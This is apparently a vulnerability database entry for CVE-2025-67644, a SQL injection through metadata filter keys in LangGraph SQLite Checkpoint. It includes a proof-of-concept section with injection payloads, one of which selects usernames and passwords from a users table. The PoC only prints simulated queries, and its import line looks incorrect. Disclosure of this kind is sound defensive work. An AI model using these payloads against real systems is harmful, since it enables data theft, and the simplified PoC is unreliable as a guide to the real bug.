Security Vulnerability Report
中文
CVE-2025-67644 CVSS 7.3 HIGH

CVE-2025-67644

Published: 2025-12-11 00:16:23
Last Modified: 2026-03-17 19:47:16
Source: [email protected]

Description

LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:langchain:langgraph-checkpoint-sqlite:*:*:*:*:*:python:*:* - VULNERABLE
LangGraph SQLite Checkpoint <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sqlite3 from langgraph.checkpoint.serde.sqlite import SqliteSaver # PoC for CVE-2025-67644: SQL Injection in LangGraph SQLite Checkpoint # This demonstrates how malicious filter keys can manipulate SQL queries def exploit_sql_injection(): """ Demonstrates SQL injection vulnerability in LangGraph SQLite Checkpoint The vulnerability exists in _metadata_predicate() function """ # Normal usage (expected behavior) normal_filter = {"user_id": "123"} # Filter by value (not vulnerable) # Malicious filter keys that exploit the vulnerability # These keys are interpolated directly into SQL without validation # Example 1: Always-true condition to extract all data malicious_key_1 = "1=1" # Becomes: "1=1 = ?" # Example 2: Union-based injection attempt malicious_key_2 = "id UNION SELECT * FROM sqlite_master--" # Example 3: Boolean-based blind injection malicious_key_3 = "' OR (SELECT COUNT(*) FROM checkpoints) > 0 AND '1'='1" # Example 4: Extract sensitive data malicious_key_4 = "id) UNION SELECT username || ':' || password FROM users--" # Simulating how the vulnerable code constructs SQL: def vulnerable_metadata_predicate(filter_keys): """ Vulnerable implementation (simplified) """ predicates = [] for key in filter_keys: # Direct interpolation without validation - VULNERABLE! predicates.append(f"{key} = ?") return " AND ".join(predicates) if predicates else "1=1" # Demonstrating the vulnerability print("Vulnerable SQL construction:") print(f"Filter keys: {malicious_key_1}") print(f"SQL predicate: {vulnerable_metadata_predicate([malicious_key_1])}") print() print(f"Filter keys: {malicious_key_3}") print(f"SQL predicate: {vulnerable_metadata_predicate([malicious_key_3])}") def demonstrate_impact(): """ Shows the potential impact of successful exploitation """ print("Potential impacts of CVE-2025-67644:") print("1. Unauthorized data access - Read all checkpoint data") print("2. Data modification - Alter or delete checkpoints") print("3. Data exfiltration - Extract sensitive information from DB") print("4. Database corruption - Modify schema or destroy data") print("5. Potential RCE - If SQLite is configured with certain extensions") if __name__ == "__main__": exploit_sql_injection() demonstrate_impact()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67644", "sourceIdentifier": "[email protected]", "published": "2025-12-11T00:16:23.230", "lastModified": "2026-03-17T19:47:15.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langgraph-checkpoint-sqlite:*:*:*:*:*:python:*:*", "versionEndExcluding": "3.0.1", "matchCriteriaId": "DCC0A08E-3556-412C-B86D-28892E29A30B"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langgraph/commit/297242913f8ad2143ee3e2f72e67db0911d48e2a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-9rwj-6rc7-p77c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.